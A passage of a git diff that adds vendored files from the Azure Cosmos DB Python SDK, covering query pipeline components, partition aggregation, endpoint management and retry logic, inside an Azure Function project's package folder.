+    """Represents an endpoint in handling a distinct query.
+
+    It returns only those values not already returned.
+    """
+    def __init__(self, execution_context):
+        super(_QueryExecutionDistinctUnorderedEndpointComponent, self).__init__(execution_context)
+        self.last_result = set()
+
+    def make_hash(self, value):
+        if isinstance(value, (set, tuple, list)):
+            return tuple([self.make_hash(v) for v in value])
+        if not isinstance(value, dict):
+            if isinstance(value, numbers.Number):
+                return float(value)
+            return value
+        new_value = copy.deepcopy(value)
+        for k, v in new_value.items():
+            new_value[k] = self.make_hash(v)
+
+        return tuple(frozenset(sorted(new_value.items())))
+
+    def __next__(self):
+        res = next(self._execution_context)
+
+        json_repr = json.dumps(self.make_hash(res))
+        json_repr = json_repr.encode("utf-8")
+
+        hash_object = hashlib.sha1(json_repr)  # nosec
+        hashed_result = hash_object.hexdigest()
+
+        while hashed_result in self.last_result:
+            res = next(self._execution_context)
+            json_repr = json.dumps(self.make_hash(res))
+            json_repr = json_repr.encode("utf-8")
+
+            hash_object = hashlib.sha1(json_repr)  # nosec
+            hashed_result = hash_object.hexdigest()
+        self.last_result.add(hashed_result)
+        return res
+
+    next = __next__  # Python 2 compatibility.
+
+
+class _QueryExecutionOffsetEndpointComponent(_QueryExecutionEndpointComponent):
+    """Represents an endpoint in handling an offset query.
+
+    It skips as many results as the offset arg specifies.
+    """
+    def __init__(self, execution_context, offset_count):
+        super(_QueryExecutionOffsetEndpointComponent, self).__init__(execution_context)
+        self._offset_count = offset_count
+
+    def __next__(self):
+        while self._offset_count > 0:
+            res = next(self._execution_context)
+            if res is not None:
+                self._offset_count -= 1
+            else:
+                raise StopIteration
+        return next(self._execution_context)
+
+    next = __next__  # Python 2 compatibility.
+
+
+class _QueryExecutionAggregateEndpointComponent(_QueryExecutionEndpointComponent):
+    """Represents an endpoint in handling an aggregate query.
+
+    It returns only aggregated values.
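+
+    The wrapped execution context is drained completely before the first
+    aggregate value is returned, since every partition must contribute to
+    the final result.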
+ """ + + def __init__(self, execution_context, aggregate_operators): + super(_QueryExecutionAggregateEndpointComponent, self).__init__(execution_context) + self._local_aggregators = [] + self._results = None + self._result_index = 0 + for operator in aggregate_operators: + if operator == "Average": + self._local_aggregators.append(_AverageAggregator()) + elif operator == "Count": + self._local_aggregators.append(_CountAggregator()) + elif operator == "Max": + self._local_aggregators.append(_MaxAggregator()) + elif operator == "Min": + self._local_aggregators.append(_MinAggregator()) + elif operator == "Sum": + self._local_aggregators.append(_SumAggregator()) + + def __next__(self): + for res in self._execution_context: + for item in res: + for operator in self._local_aggregators: + if isinstance(item, dict) and item: + operator.aggregate(item["item"]) + elif isinstance(item, numbers.Number): + operator.aggregate(item) + if self._results is None: + self._results = [] + for operator in self._local_aggregators: + self._results.append(operator.get_result()) + if self._result_index < len(self._results): + res = self._results[self._result_index] + self._result_index += 1 + return res + raise StopIteration + + next = __next__ # Python 2 compatibility. diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/execution_dispatcher.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/execution_dispatcher.py new file mode 100644 index 0000000..bc1c9f5 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/execution_dispatcher.py @@ -0,0 +1,208 @@ +# The MIT License (MIT) +# Copyright (c) 2014 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Internal class for proxy query execution context implementation in the Azure +Cosmos database service. 
+""" + +import json +from six.moves import xrange +from azure.cosmos.exceptions import CosmosHttpResponseError +from azure.cosmos._execution_context import multi_execution_aggregator +from azure.cosmos._execution_context.base_execution_context import _QueryExecutionContextBase +from azure.cosmos._execution_context.base_execution_context import _DefaultQueryExecutionContext +from azure.cosmos._execution_context.query_execution_info import _PartitionedQueryExecutionInfo +from azure.cosmos._execution_context import endpoint_component +from azure.cosmos.documents import _DistinctType +from azure.cosmos.http_constants import StatusCodes, SubStatusCodes + +# pylint: disable=protected-access + + +def _is_partitioned_execution_info(e): + return ( + e.status_code == StatusCodes.BAD_REQUEST and e.sub_status == SubStatusCodes.CROSS_PARTITION_QUERY_NOT_SERVABLE + ) + + +def _get_partitioned_execution_info(e): + error_msg = json.loads(e.http_error_message) + return _PartitionedQueryExecutionInfo(json.loads(error_msg["additionalErrorInfo"])) + + +class _ProxyQueryExecutionContext(_QueryExecutionContextBase): # pylint: disable=abstract-method + """Represents a proxy execution context wrapper. + + By default, uses _DefaultQueryExecutionContext. + + If backend responds a 400 error code with a Query Execution Info, switches + to _MultiExecutionContextAggregator + """ + + def __init__(self, client, resource_link, query, options, fetch_function): + """ + Constructor + """ + super(_ProxyQueryExecutionContext, self).__init__(client, options) + + self._execution_context = _DefaultQueryExecutionContext(client, options, fetch_function) + self._resource_link = resource_link + self._query = query + self._fetch_function = fetch_function + + def __next__(self): + """Returns the next query result. + + :return: The next query result. + :rtype: dict + :raises StopIteration: If no more result is left. + + """ + try: + return next(self._execution_context) + except CosmosHttpResponseError as e: + if _is_partitioned_execution_info(e): + query_to_use = self._query if self._query is not None else "Select * from root r" + query_execution_info = _PartitionedQueryExecutionInfo(self._client._GetQueryPlanThroughGateway + (query_to_use, self._resource_link)) + self._execution_context = self._create_pipelined_execution_context(query_execution_info) + else: + raise e + + return next(self._execution_context) + + def fetch_next_block(self): + """Returns a block of results. + + This method only exists for backward compatibility reasons. (Because + QueryIterable has exposed fetch_next_block api). + + :return: List of results. + :rtype: list + """ + try: + return self._execution_context.fetch_next_block() + except CosmosHttpResponseError as e: + if _is_partitioned_execution_info(e): + query_to_use = self._query if self._query is not None else "Select * from root r" + query_execution_info = _PartitionedQueryExecutionInfo(self._client._GetQueryPlanThroughGateway + (query_to_use, self._resource_link)) + self._execution_context = self._create_pipelined_execution_context(query_execution_info) + else: + raise e + + return self._execution_context.fetch_next_block() + + def _create_pipelined_execution_context(self, query_execution_info): + + assert self._resource_link, "code bug, resource_link is required." 
+ if query_execution_info.has_aggregates() and not query_execution_info.has_select_value(): + if self._options and ("enableCrossPartitionQuery" in self._options + and self._options["enableCrossPartitionQuery"]): + raise CosmosHttpResponseError(StatusCodes.BAD_REQUEST, + "Cross partition query only supports 'VALUE ' for aggregates") + + execution_context_aggregator = multi_execution_aggregator._MultiExecutionContextAggregator(self._client, + self._resource_link, + self._query, + self._options, + query_execution_info) + return _PipelineExecutionContext(self._client, self._options, execution_context_aggregator, + query_execution_info) + + next = __next__ # Python 2 compatibility. + + +class _PipelineExecutionContext(_QueryExecutionContextBase): # pylint: disable=abstract-method + + DEFAULT_PAGE_SIZE = 1000 + + def __init__(self, client, options, execution_context, query_execution_info): + super(_PipelineExecutionContext, self).__init__(client, options) + + if options.get("maxItemCount"): + self._page_size = options["maxItemCount"] + else: + self._page_size = _PipelineExecutionContext.DEFAULT_PAGE_SIZE + + self._execution_context = execution_context + + self._endpoint = endpoint_component._QueryExecutionEndpointComponent(execution_context) + + order_by = query_execution_info.get_order_by() + if order_by: + self._endpoint = endpoint_component._QueryExecutionOrderByEndpointComponent(self._endpoint) + + aggregates = query_execution_info.get_aggregates() + if aggregates: + self._endpoint = endpoint_component._QueryExecutionAggregateEndpointComponent(self._endpoint, aggregates) + + offset = query_execution_info.get_offset() + if offset is not None: + self._endpoint = endpoint_component._QueryExecutionOffsetEndpointComponent(self._endpoint, offset) + + top = query_execution_info.get_top() + if top is not None: + self._endpoint = endpoint_component._QueryExecutionTopEndpointComponent(self._endpoint, top) + + limit = query_execution_info.get_limit() + if limit is not None: + self._endpoint = endpoint_component._QueryExecutionTopEndpointComponent(self._endpoint, limit) + + distinct_type = query_execution_info.get_distinct_type() + if distinct_type != _DistinctType.NoneType: + if distinct_type == _DistinctType.Ordered: + self._endpoint = endpoint_component._QueryExecutionDistinctOrderedEndpointComponent(self._endpoint) + else: + self._endpoint = endpoint_component._QueryExecutionDistinctUnorderedEndpointComponent(self._endpoint) + + def __next__(self): + """Returns the next query result. + + :return: The next query result. + :rtype: dict + :raises StopIteration: If no more result is left. + """ + return next(self._endpoint) + + def fetch_next_block(self): + """Returns a block of results. + + This method only exists for backward compatibility reasons. (Because + QueryIterable has exposed fetch_next_block api). + + This method internally invokes next() as many times required to collect + the requested fetch size. + + :return: List of results. + :rtype: list + """ + + results = [] + for _ in xrange(self._page_size): + try: + results.append(next(self)) + except StopIteration: + # no more results + break + return results + + next = __next__ # Python 2 compatibility. 
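The pipeline above layers endpoint components innermost-first: order-by, then aggregate, then offset, then top/limit, then distinct. A minimal, runnable sketch of that decorator chain, using simplified stand-in classes (the names are illustrative only, not the SDK implementations):

# Illustrative sketch of the endpoint-component chain built by
# _PipelineExecutionContext; these classes are simplified stand-ins.

class _Source:
    """Yields already-merged query results."""
    def __init__(self, items):
        self._iter = iter(items)

    def __iter__(self):
        return self

    def __next__(self):
        return next(self._iter)


class _Offset:
    """Skips the first `count` results (cf. _QueryExecutionOffsetEndpointComponent)."""
    def __init__(self, inner, count):
        self._inner = inner
        self._count = count

    def __iter__(self):
        return self

    def __next__(self):
        while self._count > 0:
            next(self._inner)  # discard skipped results
            self._count -= 1
        return next(self._inner)


class _Top:
    """Stops after `count` results (cf. _QueryExecutionTopEndpointComponent)."""
    def __init__(self, inner, count):
        self._inner = inner
        self._count = count

    def __iter__(self):
        return self

    def __next__(self):
        if self._count <= 0:
            raise StopIteration
        self._count -= 1
        return next(self._inner)


# OFFSET 2 LIMIT 3 over ten merged results: components wrap innermost-first,
# mirroring the order in which _PipelineExecutionContext applies them.
pipeline = _Top(_Offset(_Source(range(10)), 2), 3)
print(list(pipeline))  # [2, 3, 4]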
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/multi_execution_aggregator.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/multi_execution_aggregator.py new file mode 100644 index 0000000..632f715 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/multi_execution_aggregator.py @@ -0,0 +1,198 @@ +# The MIT License (MIT) +# Copyright (c) 2014 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Internal class for multi execution context aggregator implementation in the Azure Cosmos database service. +""" + +import heapq +from azure.cosmos._execution_context.base_execution_context import _QueryExecutionContextBase +from azure.cosmos._execution_context import document_producer +from azure.cosmos._routing import routing_range +from azure.cosmos import exceptions + +# pylint: disable=protected-access + + +class _MultiExecutionContextAggregator(_QueryExecutionContextBase): + """This class is capable of queries which requires rewriting based on + backend's returned query execution info. + + This class maintains the execution context for each partition key range + and aggregates the corresponding results from each execution context. + + When handling an orderby query, _MultiExecutionContextAggregator + instantiates one instance of DocumentProducer per target partition key range + and aggregates the result of each. 
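+
+    The per-partition results are merged through a priority queue ordered by
+    the document producer comparator: the order-by comparator for ORDER BY
+    queries, partition key range order otherwise.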
+ """ + + # TODO improvement: this class needs to be parallelized + + class PriorityQueue: + """Provides a Priority Queue abstraction data structure""" + + def __init__(self): + self._heap = [] + + def pop(self): + return heapq.heappop(self._heap) + + def push(self, item): + heapq.heappush(self._heap, item) + + def peek(self): + return self._heap[0] + + def size(self): + return len(self._heap) + + def __init__(self, client, resource_link, query, options, partitioned_query_ex_info): + super(_MultiExecutionContextAggregator, self).__init__(client, options) + + # use the routing provider in the client + self._routing_provider = client._routing_map_provider + self._client = client + self._resource_link = resource_link + self._query = query + self._partitioned_query_ex_info = partitioned_query_ex_info + self._sort_orders = partitioned_query_ex_info.get_order_by() + + if self._sort_orders: + self._document_producer_comparator = document_producer._OrderByDocumentProducerComparator(self._sort_orders) + else: + self._document_producer_comparator = document_producer._PartitionKeyRangeDocumentProduerComparator() + + # will be a list of (partition_min, partition_max) tuples + targetPartitionRanges = self._get_target_partition_key_range() + + targetPartitionQueryExecutionContextList = [] + for partitionTargetRange in targetPartitionRanges: + # create and add the child execution context for the target range + targetPartitionQueryExecutionContextList.append( + self._createTargetPartitionQueryExecutionContext(partitionTargetRange) + ) + + self._orderByPQ = _MultiExecutionContextAggregator.PriorityQueue() + + for targetQueryExContext in targetPartitionQueryExecutionContextList: + try: + # TODO: we can also use more_itertools.peekable to be more python friendly + targetQueryExContext.peek() + # if there are matching results in the target ex range add it to the priority queue + + self._orderByPQ.push(targetQueryExContext) + + except exceptions.CosmosHttpResponseError as e: + if exceptions._partition_range_is_gone(e): + # repairing document producer context on partition split + self._repair_document_producer() + else: + raise + + except StopIteration: + continue + + def __next__(self): + """Returns the next result + + :return: The next result. + :rtype: dict + :raises StopIteration: If no more result is left. + """ + if self._orderByPQ.size() > 0: + + targetRangeExContext = self._orderByPQ.pop() + res = next(targetRangeExContext) + + try: + # TODO: we can also use more_itertools.peekable to be more python friendly + targetRangeExContext.peek() + self._orderByPQ.push(targetRangeExContext) + + except StopIteration: + pass + + return res + raise StopIteration + + def fetch_next_block(self): + + raise NotImplementedError("You should use pipeline's fetch_next_block.") + + def _repair_document_producer(self): + """Repairs the document producer context by using the re-initialized routing map provider in the client, + which loads in a refreshed partition key range cache to re-create the partition key ranges. + After loading this new cache, the document producers get re-created with the new valid ranges. 
+ """ + # refresh the routing provider to get the newly initialized one post-refresh + self._routing_provider = self._client._routing_map_provider + # will be a list of (partition_min, partition_max) tuples + targetPartitionRanges = self._get_target_partition_key_range() + + targetPartitionQueryExecutionContextList = [] + for partitionTargetRange in targetPartitionRanges: + # create and add the child execution context for the target range + targetPartitionQueryExecutionContextList.append( + self._createTargetPartitionQueryExecutionContext(partitionTargetRange) + ) + + self._orderByPQ = _MultiExecutionContextAggregator.PriorityQueue() + + for targetQueryExContext in targetPartitionQueryExecutionContextList: + try: + # TODO: we can also use more_itertools.peekable to be more python friendly + targetQueryExContext.peek() + # if there are matching results in the target ex range add it to the priority queue + + self._orderByPQ.push(targetQueryExContext) + + except StopIteration: + continue + + def _createTargetPartitionQueryExecutionContext(self, partition_key_target_range): + + rewritten_query = self._partitioned_query_ex_info.get_rewritten_query() + if rewritten_query: + if isinstance(self._query, dict): + # this is a parameterized query, collect all the parameters + query = dict(self._query) + query["query"] = rewritten_query + else: + query = rewritten_query + else: + query = self._query + + return document_producer._DocumentProducer( + partition_key_target_range, + self._client, + self._resource_link, + query, + self._document_producer_comparator, + self._options, + ) + + def _get_target_partition_key_range(self): + + query_ranges = self._partitioned_query_ex_info.get_query_ranges() + return self._routing_provider.get_overlapping_ranges( + self._resource_link, [routing_range.Range.ParseFromDict(range_as_dict) for range_as_dict in query_ranges] + ) + + next = __next__ # Python 2 compatibility. diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/query_execution_info.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/query_execution_info.py new file mode 100644 index 0000000..e9f3e7d --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/query_execution_info.py @@ -0,0 +1,130 @@ +# The MIT License (MIT) +# Copyright (c) 2014 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE
+# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+# SOFTWARE.
+
+"""Internal class for partitioned query execution info implementation in the Azure Cosmos database service.
+"""
+
+from azure.cosmos.documents import _DistinctType
+
+
+class _PartitionedQueryExecutionInfo(object):
+    """Represents a wrapper helper for partitioned query execution info
+    dictionary returned by the backend.
+    """
+
+    QueryInfoPath = "queryInfo"
+    HasSelectValue = [QueryInfoPath, "hasSelectValue"]
+    TopPath = [QueryInfoPath, "top"]
+    OffsetPath = [QueryInfoPath, "offset"]
+    LimitPath = [QueryInfoPath, "limit"]
+    DistinctTypePath = [QueryInfoPath, "distinctType"]
+    OrderByPath = [QueryInfoPath, "orderBy"]
+    AggregatesPath = [QueryInfoPath, "aggregates"]
+    QueryRangesPath = "queryRanges"
+    RewrittenQueryPath = [QueryInfoPath, "rewrittenQuery"]
+
+    def __init__(self, query_execution_info):
+        """
+        :param dict query_execution_info:
+        """
+        self._query_execution_info = query_execution_info
+
+    def get_top(self):
+        """Returns the top count (if any) or None.
+        """
+        return self._extract(_PartitionedQueryExecutionInfo.TopPath)
+
+    def get_limit(self):
+        """Returns the limit count (if any) or None.
+        """
+        return self._extract(_PartitionedQueryExecutionInfo.LimitPath)
+
+    def get_offset(self):
+        """Returns the offset count (if any) or None.
+        """
+        return self._extract(_PartitionedQueryExecutionInfo.OffsetPath)
+
+    def get_distinct_type(self):
+        """Returns the distinct type (if any) or None.
+        """
+        return self._extract(_PartitionedQueryExecutionInfo.DistinctTypePath)
+
+    def get_order_by(self):
+        """Returns order by items (if any) or None.
+        """
+        return self._extract(_PartitionedQueryExecutionInfo.OrderByPath)
+
+    def get_aggregates(self):
+        """Returns aggregators (if any) or None.
+        """
+        return self._extract(_PartitionedQueryExecutionInfo.AggregatesPath)
+
+    def get_query_ranges(self):
+        """Returns query partition ranges (if any) or None.
+        """
+        return self._extract(_PartitionedQueryExecutionInfo.QueryRangesPath)
+
+    def get_rewritten_query(self):
+        """Returns the rewritten query (if any) or None.
+ """ + rewrittenQuery = self._extract(_PartitionedQueryExecutionInfo.RewrittenQueryPath) + if rewrittenQuery is not None: + # Hardcode formattable filter to true for now + rewrittenQuery = rewrittenQuery.replace("{documentdb-formattableorderbyquery-filter}", "true") + return rewrittenQuery + + def has_select_value(self): + return self._extract(self.HasSelectValue) + + def has_top(self): + return self.get_top() is not None + + def has_limit(self): + return self.get_limit() is not None + + def has_offset(self): + return self.get_offset() is not None + + def has_distinct_type(self): + return self.get_distinct_type() != _DistinctType.NoneType + + def has_order_by(self): + order_by = self.get_order_by() + return order_by is not None and len(order_by) > 0 + + def has_aggregates(self): + aggregates = self.get_aggregates() + return aggregates is not None and len(aggregates) > 0 + + def has_rewritten_query(self): + return self.get_rewritten_query() is not None + + def _extract(self, path): + + item = self._query_execution_info + if isinstance(path, str): + return item.get(path) + + for p in path: + item = item.get(p) + if item is None: + return None + return item diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_global_endpoint_manager.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_global_endpoint_manager.py new file mode 100644 index 0000000..7e35648 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_global_endpoint_manager.py @@ -0,0 +1,174 @@ +# The MIT License (MIT) +# Copyright (c) 2014 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Internal class for global endpoint manager implementation in the Azure Cosmos +database service. +""" + +import threading + +from six.moves.urllib.parse import urlparse + +from . import _constants as constants +from . import exceptions +from ._location_cache import LocationCache + +# pylint: disable=protected-access + + +class _GlobalEndpointManager(object): + """ + This internal class implements the logic for endpoint management for + geo-replicated database accounts. 
+ """ + + def __init__(self, client): + self.Client = client + self.EnableEndpointDiscovery = client.connection_policy.EnableEndpointDiscovery + self.PreferredLocations = client.connection_policy.PreferredLocations + self.DefaultEndpoint = client.url_connection + self.refresh_time_interval_in_ms = self.get_refresh_time_interval_in_ms_stub() + self.location_cache = LocationCache( + self.PreferredLocations, + self.DefaultEndpoint, + self.EnableEndpointDiscovery, + client.connection_policy.UseMultipleWriteLocations, + self.refresh_time_interval_in_ms, + ) + self.refresh_needed = False + self.refresh_lock = threading.RLock() + self.last_refresh_time = 0 + + def get_refresh_time_interval_in_ms_stub(self): # pylint: disable=no-self-use + return constants._Constants.DefaultUnavailableLocationExpirationTime + + def get_write_endpoint(self): + return self.location_cache.get_write_endpoint() + + def get_read_endpoint(self): + return self.location_cache.get_read_endpoint() + + def resolve_service_endpoint(self, request): + return self.location_cache.resolve_service_endpoint(request) + + def mark_endpoint_unavailable_for_read(self, endpoint): + self.location_cache.mark_endpoint_unavailable_for_read(endpoint) + + def mark_endpoint_unavailable_for_write(self, endpoint): + self.location_cache.mark_endpoint_unavailable_for_write(endpoint) + + def get_ordered_write_endpoints(self): + return self.location_cache.get_ordered_write_endpoints() + + def get_ordered_read_endpoints(self): + return self.location_cache.get_ordered_read_endpoints() + + def can_use_multiple_write_locations(self, request): + return self.location_cache.can_use_multiple_write_locations_for_request(request) + + def force_refresh(self, database_account): + self.refresh_needed = True + self.refresh_endpoint_list(database_account) + + def refresh_endpoint_list(self, database_account, **kwargs): + with self.refresh_lock: + # if refresh is not needed or refresh is already taking place, return + if not self.refresh_needed: + return + try: + self._refresh_endpoint_list_private(database_account, **kwargs) + except Exception as e: + raise e + + def _refresh_endpoint_list_private(self, database_account=None, **kwargs): + if database_account: + self.location_cache.perform_on_database_account_read(database_account) + self.refresh_needed = False + + if ( + self.location_cache.should_refresh_endpoints() + and self.location_cache.current_time_millis() - self.last_refresh_time > self.refresh_time_interval_in_ms + ): + if not database_account: + database_account = self._GetDatabaseAccount(**kwargs) + self.location_cache.perform_on_database_account_read(database_account) + self.last_refresh_time = self.location_cache.current_time_millis() + self.refresh_needed = False + + def _GetDatabaseAccount(self, **kwargs): + """Gets the database account. + + First tries by using the default endpoint, and if that doesn't work, + use the endpoints for the preferred locations in the order they are + specified, to get the database account. 
+ """ + try: + database_account = self._GetDatabaseAccountStub(self.DefaultEndpoint, **kwargs) + return database_account + # If for any reason(non-globaldb related), we are not able to get the database + # account from the above call to GetDatabaseAccount, we would try to get this + # information from any of the preferred locations that the user might have + # specified (by creating a locational endpoint) and keeping eating the exception + # until we get the database account and return None at the end, if we are not able + # to get that info from any endpoints + except exceptions.CosmosHttpResponseError: + for location_name in self.PreferredLocations: + locational_endpoint = _GlobalEndpointManager.GetLocationalEndpoint(self.DefaultEndpoint, location_name) + try: + database_account = self._GetDatabaseAccountStub(locational_endpoint, **kwargs) + return database_account + except exceptions.CosmosHttpResponseError: + pass + + return None + + def _GetDatabaseAccountStub(self, endpoint, **kwargs): + """Stub for getting database account from the client. + + This can be used for mocking purposes as well. + """ + return self.Client.GetDatabaseAccount(endpoint, **kwargs) + + @staticmethod + def GetLocationalEndpoint(default_endpoint, location_name): + # For default_endpoint like 'https://contoso.documents.azure.com:443/' parse it to + # generate URL format. This default_endpoint should be global endpoint(and cannot + # be a locational endpoint) and we agreed to document that + endpoint_url = urlparse(default_endpoint) + + # hostname attribute in endpoint_url will return 'contoso.documents.azure.com' + if endpoint_url.hostname is not None: + hostname_parts = str(endpoint_url.hostname).lower().split(".") + if hostname_parts is not None: + # global_database_account_name will return 'contoso' + global_database_account_name = hostname_parts[0] + + # Prepare the locational_database_account_name as contoso-EastUS for location_name 'East US' + locational_database_account_name = global_database_account_name + "-" + location_name.replace(" ", "") + + # Replace 'contoso' with 'contoso-EastUS' and return locational_endpoint + # as https://contoso-EastUS.documents.azure.com:443/ + locational_endpoint = default_endpoint.lower().replace( + global_database_account_name, locational_database_account_name, 1 + ) + return locational_endpoint + + return None diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_gone_retry_policy.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_gone_retry_policy.py new file mode 100644 index 0000000..23aef98 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_gone_retry_policy.py @@ -0,0 +1,53 @@ +# The MIT License (MIT) +# Copyright (c) 2021 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. 
+ +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Internal class for connection reset retry policy implementation in the Azure +Cosmos database service. +""" + + +# pylint: disable=protected-access + + +class PartitionKeyRangeGoneRetryPolicy(object): + + def __init__(self, client, *args): + self.retry_after_in_milliseconds = 1000 + self.refresh_partition_key_range_cache = True + self.args = args + self.client = client + self.exception = None + + def ShouldRetry(self, exception): + """Returns true if should retry based on the passed-in exception. + + :param (exceptions.CosmosHttpResponseError instance) exception: + :rtype: boolean + + """ + self.exception = exception # needed for pylint + if self.refresh_partition_key_range_cache: + # refresh routing_map_provider to refresh partition key range cache + # make refresh_partition_key_range_cache False to skip this check on subsequent Gone exceptions + self.client.refresh_routing_map_provider() + self.refresh_partition_key_range_cache = False + # return False to raise error to multi_execution_aggregator and repair document producer context + return False diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_location_cache.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_location_cache.py new file mode 100644 index 0000000..91a62b8 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_location_cache.py @@ -0,0 +1,329 @@ +# The MIT License (MIT) +# Copyright (c) 2018 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS 